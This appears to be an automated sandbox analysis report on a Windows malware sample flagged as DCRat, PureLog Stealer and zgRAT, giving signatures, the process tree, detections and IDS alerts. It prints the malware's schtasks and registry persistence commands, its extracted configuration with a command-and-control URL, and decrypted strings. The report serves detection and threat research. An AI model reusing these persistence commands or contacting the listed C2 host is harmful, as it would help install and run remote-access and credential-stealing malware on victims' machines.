
Windows Analysis Report
t8F7Ic986c.exe

Overview

General Information

Sample name: t8F7Ic986c.exe (renamed because the original name is a hash value)
Original sample name: a4923d4db3234b3905ad3097cc03af46.exe
Analysis ID: 1583176
MD5: a4923d4db3234b3905ad3097cc03af46
SHA1: 3e12ad372643b3c9d91053b91f61f8cd7e42118c
SHA256: 4685860269353c0eaaec2e5da79cb35a475123a37fa6d77c4faf345840da2a10
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found pyInstaller with non standard icon
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • t8F7Ic986c.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\t8F7Ic986c.exe" MD5: A4923D4DB3234B3905AD3097CC03AF46)
    • t8F7Ic986c.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\t8F7Ic986c.exe" MD5: A4923D4DB3234B3905AD3097CC03AF46)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BoosterX.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234 MD5: B0A28FF93B030B10FD70698A5A7C27D0)
          • cmd.exe (PID: 7688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Chaindriver.sfx.exe (PID: 7732 cmdline: Chaindriver.sfx.exe -p1234 MD5: 9E935AF26F27628601A2A336CA24AEF2)
              • Chaindriver.exe (PID: 7852 cmdline: "C:\Chaindriver.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
                • schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • csc.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                  • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cvtres.exe (PID: 8040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8112 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7100 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7272 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7296 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 4348 cmdline: schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 3492 cmdline: schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 5016 cmdline: schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 3192 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 5960 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • Chaindriver.exe (PID: 7712 cmdline: "C:\Chaindriver.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Chaindriver.exe (PID: 2336 cmdline: C:\Chaindriver.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Chaindriver.exe (PID: 2256 cmdline: C:\Chaindriver.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Memory Compression.exe (PID: 2704 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Memory Compression.exe (PID: 6924 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
    • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7936 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • NOFqHeDosUIopsPGLT.exe (PID: 7316 cmdline: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • NOFqHeDosUIopsPGLT.exe (PID: 7496 cmdline: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • NOFqHeDosUIopsPGLT.exe (PID: 7976 cmdline: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • cleanup
{"C2 url": "http://797441cm.n9shteam2.top/Videouploads", "MUTEX": "DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author
C:\Recovery\Memory Compression.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\Memory Compression.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\NOFqHeDosUIopsPGLT.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\NOFqHeDosUIopsPGLT.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\NOFqHeDosUIopsPGLT.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: Chaindriver.exe PID: 7852 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: Memory Compression.exe PID: 6924 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
8.0.Chaindriver.exe.660000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
8.0.Chaindriver.exe.660000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, CommandLine: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, NewProcessName: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, OriginalFileName: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, ProcessId: 7316, ProcessName: NOFqHeDosUIopsPGLT.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetFilename: C:\Users\Default\Pictures\RuntimeBroker.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: "C:\Users\Default\Pictures\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\NOFqHeDosUIopsPGLT.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NOFqHeDosUIopsPGLT
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Recovery\NOFqHeDosUIopsPGLT.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", ProcessId: 7988, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, CommandLine: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, ProcessId: 8064, ProcessName: schtasks.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetFilename: C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", ProcessId: 7988, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, ProcessId: 7100, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T07:42:12.937028+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:40.718432+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:47.937085+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:57.077732+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:05.374608+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49788 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:08.640348+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49809 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:10.452741+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49820 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:13.468391+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49841 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:15.952759+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49859 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:37.905923+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49995 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:46.015323+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:49.327933+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:52.952838+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 185.158.202.52 | 80 | TCP

                          AV Detection

Source: t8F7Ic986c.exe | Avira: detected
Source: http://797441cm.n9shteam2.top | Avira URL Cloud: Label: malware
Source: http://797441cm.n9shteam2.top/Videouploads.php | Avira URL Cloud: Label: malware
Source: http://797441cm.n9shteam2.top/ | Avira URL Cloud: Label: malware
Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\Memory Compression.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\KGIrVxyv.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\TkRgFrOc.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Chaindriver.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Default\Pictures\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Avira: detection malicious, Label: TR/AVI.Agent.denui
Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\PxTXHLsG.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://797441cm.n9shteam2.top/Videouploads", "MUTEX": "DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Chaindriver.exe | ReversingLabs: Detection: 69%
Source: C:\Chaindriver.sfx.exe | ReversingLabs: Detection: 18%
Source: C:\Recovery\Memory Compression.exe | ReversingLabs: Detection: 69%
Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe | ReversingLabs: Detection: 69%
Source: C:\Users\Default\Pictures\RuntimeBroker.exe | ReversingLabs: Detection: 69%
Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | ReversingLabs: Detection: 56%
Source: C:\Users\user\Desktop\FnBzuKhI.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\KGIrVxyv.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\PxTXHLsG.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TkRgFrOc.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\Zfmnrnxn.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\viEjRGTv.log | ReversingLabs: Detection: 25%
Source: t8F7Ic986c.exe | ReversingLabs: Detection: 47%
Source: t8F7Ic986c.exe | Virustotal: Detection: 61%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe | Joe Sandbox ML: detected
Source: C:\Recovery\Memory Compression.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HTKiXRcY.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BXpblVtN.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TkRgFrOc.log | Joe Sandbox ML: detected
Source: C:\Chaindriver.exe | Joe Sandbox ML: detected
Source: C:\Users\Default\Pictures\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe | Joe Sandbox ML: detected
Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://797441cm.n9shteam2.top/","Videouploads"]]
Source: t8F7Ic986c.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\python39.pdb source: t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: D:\a01\_work\26\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: .pdbza, source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp
